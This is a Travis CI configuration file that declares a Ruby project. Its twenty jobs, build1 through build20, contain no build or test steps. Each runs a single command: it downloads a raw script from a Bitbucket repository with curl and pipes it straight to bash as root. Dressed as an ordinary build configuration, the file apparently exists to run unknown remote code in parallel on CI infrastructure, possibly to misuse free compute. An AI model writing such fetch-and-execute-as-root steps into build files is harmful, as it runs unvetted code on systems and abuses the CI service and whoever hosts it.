language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/kkiyel/yelony/raw/d165f6642abe407f332ac25df0a5833d231e83fe/lolyh | bash
        